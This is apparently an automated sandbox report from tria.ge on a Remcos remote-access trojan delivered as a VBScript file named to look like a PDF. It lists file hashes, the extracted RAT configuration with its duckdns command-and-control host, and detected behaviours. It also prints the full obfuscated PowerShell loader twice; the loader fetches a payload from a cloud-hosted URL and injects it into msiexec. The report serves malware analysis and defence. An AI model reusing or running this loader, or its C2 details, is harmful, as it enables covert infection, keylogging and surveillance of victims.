Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

1800001255...df.vbs

windows7-x64

10

1800001255...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/09/2024, 09:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    18000012550_20240930_0078864246·pdf.vbs

  • Size

    70KB

  • MD5

    89985981616f5fdef265814322d9735d

  • SHA1

    a7a505cea8373907fec133bf34d8d38e86e4dfb2

  • SHA256

    701bac7c15873d9eadaf8a70ca969adb5d3036421f1872cc706adafc51f7f751

  • SHA512

    9129378a54842082be7097682acf92536c0fe2953d02ed8c27acd7d5e172c0c72b72993b9e4ce0ae208ee751187a66c0bd82771a40a4d6a63b052d7553d50eea

  • SSDEEP

    1536:sFfpwpBuWDXAU8M9CTszU4+fsEkbf11CLmVYf:sFfWSIA7MOfsEEfEf

Score
10/10
remcosremotehostdiscoveryrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • delete_file

    false

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-WDQFG0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\18000012550_20240930_0078864246·pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3460
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholts ' Th,r$ThewigOphrsLAce oO GelnB Ju eaTpp flHe.lg: lkniHA lerO BencBCompon S msAAlbueIdetaiLUetabeEnigmR Omla=SpindN Fje eDupliWNumme- rescORuslab Idryj k reESapo CN.nphtBaand StenbSScr wYWoofsSHurryTAfte EvidenMFrodi.ba.leNOpti EHyperTUncan.U dslwBudgeeArchpbskannCTurd LAfsati Rhi,eKlorenPan eTMades ');Katedres ($Dodrantal110);Katedres (Rundholts 'Hypsf$ F,uaHChinco Ree bFormon MousaOptraiEntr,lTekste R.dir Y ed.SkaebH skydefindeaPastedHomoleTrumfr S,uls vows[Produ$ lutcPTermoa LiotaFlygthChecknFurn.gM skes.omefmSkyl o BandtSit moBeclarKipkas Enst] oida=Hepta$ Fo tOL mpwxCardiySalfehBlodge PraemHospioReguicInterySideoasexa nPanteiTurginqua r ');$Verdensanskuelser=Rundholts ' yros$TilbyHQuagmoDemo.bThwa nAsparaBedspi RheulIrr peSlalorFi ke.VersaDAnt co Rigew onfln Ophelencyko A,ndaReco dTopplFOptjei midtlLosseePatri(Reakt$vrdirSPrislyadenomObs epYdelsaEddert Datai EnebsDipsorEnligeRdgrarhyp osKosmo,Favou$sangrUFag nn ,ornl KiwaiSkannnAthe kPh lai FornnKul,kgRussi)Sp ed ';$Unlinking=$Millioner;Katedres (Rundholts 'Svare$Bill gnittalBrodeoPrecaBC phaATidsflstrow: b neAPremirBlethbU.dtroBredbrSkride Til TlektieZ lottTr cuSSnadr= ovn( UltrtUnexpeDai iSLorest,ppen- Urbap MiljaSkinnTTonguhDogca Avis$ EnspuImmornAdvislArm,tiDistnnS ckek Be tiP.opan itrigRundk)dagli ');while (!$Arboretets) {Katedres (Rundholts ',irpa$Slavog.ilkal Af ioChiefbLampeaOv rfl Erhv: MgledSk leiChitosMastipO ermabi,abt Justr,lguiiValfaaProbltTelefeStrindSlavi=Amt v$ onpatBabblr eneuTheateFae,a ') ;Katedres $Verdensanskuelser;Katedres (Rundholts 'AlmicSBestetKarabaKong rUnhy,tBanta-Di.gnSUnderlVinkee PredeGranipDisre Salig4.erho ');Katedres (Rundholts 'Deakt$Kutc,gSter,lfor aoParbobNudapaErhvelUnder: ScioA OsterLa,neb nsupo yranrJournePhanetgradie DanstArrigsTymon=Gildn(TrickTDesseeUud.os SkydtA lin-SpndvP TaagaS vertPaas hDuche Expel$RisenU AnkynEberulOrdeniVide,nMorgekFag,riRea snCar,ig.esti)Tellu ') ;Katedres (Rundholts ' Spil$Bhilig B yalm wkioMangabVisagaantimlK lif:BefelkFo.lei resblSvineoPickfmDwineeO eratNe vreAandsrLagrivMo,uliDega,sAntis=Om ld$In ongUndeflMusikoPreunbSamenaProdul Deuc:ProclM PolyiRempld ultedDilaneT.mmel OpbymUsselaOvertnSpe.idSc ig+Curba+ Ski,%Halvt$Sozz PTremoa Cif l CoupaFl esvOutcoeStemprBetone Apots .aks.Taks,cAfdano E bsuBa tin U.plt.opul ') ;$Sympatisrers=$Palaveres[$kilometervis];}$Suffragette=325927;$Fljl=31238;Katedres (Rundholts 'Ox.ge$ Demeg Infil Dis o be,obAm ioa Ta klAfsag:OppebT K lli polyl K.lbbD,stiaSkattgF naleOms yvAzurmiPietes.rihanVivi i iskenKlv dgP.rafeS,raar GhernFir,te Edmo Nylgh=Penta iveaG FlneeAfdelt.stig- HaloCNegatoSk slnTsni t PrepeSnyltnArchctSup r P ppi$E.traUBajonnfeltblC mosiInfornSlokekFuldbiUddannR incgAsymp ');Katedres (Rundholts 'Sniff$bredbgUndimlGeniooEpidob DommaInspilFa,rn:Ann.kSMa,prmUvor o Photk eonaeLattesSklms Fasc,=cater Vandc[TaxieS B,okyAccoysad.entDec.leFagtimMoile.KolleCDiscio Spi.nFred,v Omskeun.iprStilltGalni]Prefe:H sto: tmosF P,werG,easo.rescm Fru Bh.lpeaSona,s raneOvers6 Slid4NiterS,onglt Sub r.bdomiDeorinAandsgF,rst(Drues$Re,atTHj.ali TurdlSiderbMolaraProskgFodrseWhilev engeiSkabesDiartn ddb i Boo.n Udtrg Fde eRegnerTeg,snConv ePu ss) Kono ');Katedres (Rundholts 'Blres$ KommgW erel gentoChorob Gymna EskilGige :HominP ReceaBialotUnderrV detoTekstnAcroliNonrhsVel teUri.a ,igeo=Exces Stipu[midcaSsacchyFejlasGernetCoprieRegnsm In.i.angreTReforeendetxAngivtVange.,dvanEEngronRec vc onacoPolitd Scoui KybenCoppegDaaer]P ner:Tr ld:,eogaA ambeSRecomCS,davIStyr.IAteli.l vvaG ,radeHelodtAbe rS ajbat idsbrFlskeiUdstynA.bejg Para(Fluev$jubilSBerm.mMili o IdrtkForsteguds.s Fuel)Tyson ');Katedres (Rundholts 'Amtsr$Ge ekg TilblmooleoDybfrbUreidaKlepplVinbj:nonarJBone,oDiss.m FrafsAd.irvLndstiAdsb kCykeli Crann spirgbrido=Armkr$Si.yfP sti a synctSluknrTypomoPre rnInteriUnsnosaccoueEvaku.HypersEflaguTritibMidtps AbdatSelskr de miAgglunKaryagTyra (Sprjt$ Arb SClamwuTra.tfRe.apfNudisrUforsaFlon.gHyd,oe Fibrt Cojot oxieosma ,Thora$ejendFNyetalFejlkj andulMlkeg) Prot ');Katedres $Jomsviking;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3360
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$Sympatisrers=$Palaveres[0];$Dodrantal110=(Rundholts ' Th,r$ThewigOphrsLAce oO GelnB Ju eaTpp flHe.lg: lkniHA lerO BencBCompon S msAAlbueIdetaiLUetabeEnigmR Omla=SpindN Fje eDupliWNumme- rescORuslab Idryj k reESapo CN.nphtBaand StenbSScr wYWoofsSHurryTAfte EvidenMFrodi.ba.leNOpti EHyperTUncan.U dslwBudgeeArchpbskannCTurd LAfsati Rhi,eKlorenPan eTMades ');Katedres ($Dodrantal110);Katedres (Rundholts 'Hypsf$ F,uaHChinco Ree bFormon MousaOptraiEntr,lTekste R.dir Y ed.SkaebH skydefindeaPastedHomoleTrumfr S,uls vows[Produ$ lutcPTermoa LiotaFlygthChecknFurn.gM skes.omefmSkyl o BandtSit moBeclarKipkas Enst] oida=Hepta$ Fo tOL mpwxCardiySalfehBlodge PraemHospioReguicInterySideoasexa nPanteiTurginqua r ');$Verdensanskuelser=Rundholts ' yros$TilbyHQuagmoDemo.bThwa nAsparaBedspi RheulIrr peSlalorFi ke.VersaDAnt co Rigew onfln Ophelencyko A,ndaReco dTopplFOptjei midtlLosseePatri(Reakt$vrdirSPrislyadenomObs epYdelsaEddert Datai EnebsDipsorEnligeRdgrarhyp osKosmo,Favou$sangrUFag nn ,ornl KiwaiSkannnAthe kPh lai FornnKul,kgRussi)Sp ed ';$Unlinking=$Millioner;Katedres (Rundholts 'Svare$Bill gnittalBrodeoPrecaBC phaATidsflstrow: b neAPremirBlethbU.dtroBredbrSkride Til TlektieZ lottTr cuSSnadr= ovn( UltrtUnexpeDai iSLorest,ppen- Urbap MiljaSkinnTTonguhDogca Avis$ EnspuImmornAdvislArm,tiDistnnS ckek Be tiP.opan itrigRundk)dagli ');while (!$Arboretets) {Katedres (Rundholts ',irpa$Slavog.ilkal Af ioChiefbLampeaOv rfl Erhv: MgledSk leiChitosMastipO ermabi,abt Justr,lguiiValfaaProbltTelefeStrindSlavi=Amt v$ onpatBabblr eneuTheateFae,a ') ;Katedres $Verdensanskuelser;Katedres (Rundholts 'AlmicSBestetKarabaKong rUnhy,tBanta-Di.gnSUnderlVinkee PredeGranipDisre Salig4.erho ');Katedres (Rundholts 'Deakt$Kutc,gSter,lfor aoParbobNudapaErhvelUnder: ScioA OsterLa,neb nsupo yranrJournePhanetgradie DanstArrigsTymon=Gildn(TrickTDesseeUud.os SkydtA lin-SpndvP TaagaS vertPaas hDuche Expel$RisenU AnkynEberulOrdeniVide,nMorgekFag,riRea snCar,ig.esti)Tellu ') ;Katedres (Rundholts ' Spil$Bhilig B yalm wkioMangabVisagaantimlK lif:BefelkFo.lei resblSvineoPickfmDwineeO eratNe vreAandsrLagrivMo,uliDega,sAntis=Om ld$In ongUndeflMusikoPreunbSamenaProdul Deuc:ProclM PolyiRempld ultedDilaneT.mmel OpbymUsselaOvertnSpe.idSc ig+Curba+ Ski,%Halvt$Sozz PTremoa Cif l CoupaFl esvOutcoeStemprBetone Apots .aks.Taks,cAfdano E bsuBa tin U.plt.opul ') ;$Sympatisrers=$Palaveres[$kilometervis];}$Suffragette=325927;$Fljl=31238;Katedres (Rundholts 'Ox.ge$ Demeg Infil Dis o be,obAm ioa Ta klAfsag:OppebT K lli polyl K.lbbD,stiaSkattgF naleOms yvAzurmiPietes.rihanVivi i iskenKlv dgP.rafeS,raar GhernFir,te Edmo Nylgh=Penta iveaG FlneeAfdelt.stig- HaloCNegatoSk slnTsni t PrepeSnyltnArchctSup r P ppi$E.traUBajonnfeltblC mosiInfornSlokekFuldbiUddannR incgAsymp ');Katedres (Rundholts 'Sniff$bredbgUndimlGeniooEpidob DommaInspilFa,rn:Ann.kSMa,prmUvor o Photk eonaeLattesSklms Fasc,=cater Vandc[TaxieS B,okyAccoysad.entDec.leFagtimMoile.KolleCDiscio Spi.nFred,v Omskeun.iprStilltGalni]Prefe:H sto: tmosF P,werG,easo.rescm Fru Bh.lpeaSona,s raneOvers6 Slid4NiterS,onglt Sub r.bdomiDeorinAandsgF,rst(Drues$Re,atTHj.ali TurdlSiderbMolaraProskgFodrseWhilev engeiSkabesDiartn ddb i Boo.n Udtrg Fde eRegnerTeg,snConv ePu ss) Kono ');Katedres (Rundholts 'Blres$ KommgW erel gentoChorob Gymna EskilGige :HominP ReceaBialotUnderrV detoTekstnAcroliNonrhsVel teUri.a ,igeo=Exces Stipu[midcaSsacchyFejlasGernetCoprieRegnsm In.i.angreTReforeendetxAngivtVange.,dvanEEngronRec vc onacoPolitd Scoui KybenCoppegDaaer]P ner:Tr ld:,eogaA ambeSRecomCS,davIStyr.IAteli.l vvaG ,radeHelodtAbe rS ajbat idsbrFlskeiUdstynA.bejg Para(Fluev$jubilSBerm.mMili o IdrtkForsteguds.s Fuel)Tyson ');Katedres (Rundholts 'Amtsr$Ge ekg TilblmooleoDybfrbUreidaKlepplVinbj:nonarJBone,oDiss.m FrafsAd.irvLndstiAdsb kCykeli Crann spirgbrido=Armkr$Si.yfP sti a synctSluknrTypomoPre rnInteriUnsnosaccoueEvaku.HypersEflaguTritibMidtps AbdatSelskr de miAgglunKaryagTyra (Sprjt$ Arb SClamwuTra.tfRe.apfNudisrUforsaFlon.gHyd,oe Fibrt Cojot oxieosma ,Thora$ejendFNyetalFejlkj andulMlkeg) Prot ');Katedres $Jomsviking;"
    1⤵
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:752
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      PID:2868

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    d7ecf432f3529c1db9b9011ebb31d92c

    SHA1

    9aeb28007a58635940ea7c6d89d8376c916b9910

    SHA256

    bbb2b9c7f642939340b27c89eba3bba004ef9e4aa20c5db0100b53a0dffe6978

    SHA512

    3789c2a21f75dcaaba1b93c11877f41f192fbc3717a70d7db70e4571abfd2c2ca2f98bbd35c501a4339d3fb9e33faee64f8011c053883708ea7b9fda1de4fae4

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    1e674e03a1292678c1aeab7010a77a6c

    SHA1

    de005829eda4db62abec97cfeaa98121448da018

    SHA256

    9bbd6466b0a2aa528cb66cfc3729f91f623b1d5d6d24cb4ebea3159e8284d3ea

    SHA512

    36dde97decf9342cd5314ea62842bdd0f3c0698eee4a782244879eb07c0a9ca4de8f3dfbb3bc03a5fd1af7720cbd47976a3e44434ae20a900507143bee9e02d1

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y0totjvi.wwk.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Forsvarsministers.Sca
    Filesize

    465KB

    MD5

    14b49dcb01461bfc4769023a403a5b1a

    SHA1

    c30a85bf569d584e918fe93be93494c76b119add

    SHA256

    1e8e511894d67dadb6441a4b9e9315d4f2ce396b89d6fc7631ee2ff5f103556b

    SHA512

    89089191d855f064b69a6b1499c25bdc0a5842e167dc17448bf18aa8aa4ec3abb7a852bdfbfc3acfba7c4240602536f52efcd31978d74e71a232e2f0ef21b42b

    Download Submit

  • memory/752-42-0x0000000006520000-0x000000000653A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/752-44-0x0000000007180000-0x00000000071A2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/752-47-0x0000000008540000-0x000000000BE06000-memory.dmp

    Filesize

    56.8MB

    Download

  • memory/752-45-0x0000000007F90000-0x0000000008534000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/752-43-0x00000000071E0000-0x0000000007276000-memory.dmp

    Filesize

    600KB

    Download

  • memory/752-41-0x0000000007910000-0x0000000007F8A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/752-40-0x0000000005FB0000-0x0000000005FFC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/752-23-0x0000000004A30000-0x0000000004A66000-memory.dmp

    Filesize

    216KB

    Download

  • memory/752-24-0x00000000050A0000-0x00000000056C8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/752-25-0x0000000005700000-0x0000000005722000-memory.dmp

    Filesize

    136KB

    Download

  • memory/752-26-0x00000000057A0000-0x0000000005806000-memory.dmp

    Filesize

    408KB

    Download

  • memory/752-27-0x0000000005880000-0x00000000058E6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/752-37-0x0000000005970000-0x0000000005CC4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/752-39-0x0000000005F80000-0x0000000005F9E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/2868-61-0x0000000000400000-0x0000000001654000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/3360-12-0x00007FFDEC890000-0x00007FFDED351000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3360-22-0x00007FFDEC890000-0x00007FFDED351000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3360-19-0x00007FFDEC890000-0x00007FFDED351000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3360-0-0x00007FFDEC893000-0x00007FFDEC895000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3360-18-0x00007FFDEC890000-0x00007FFDED351000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3360-15-0x00007FFDEC893000-0x00007FFDEC895000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3360-17-0x00007FFDEC890000-0x00007FFDED351000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3360-11-0x00007FFDEC890000-0x00007FFDED351000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3360-16-0x00007FFDEC890000-0x00007FFDED351000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3360-6-0x000001DAEE870000-0x000001DAEE892000-memory.dmp

    Filesize

    136KB

    Download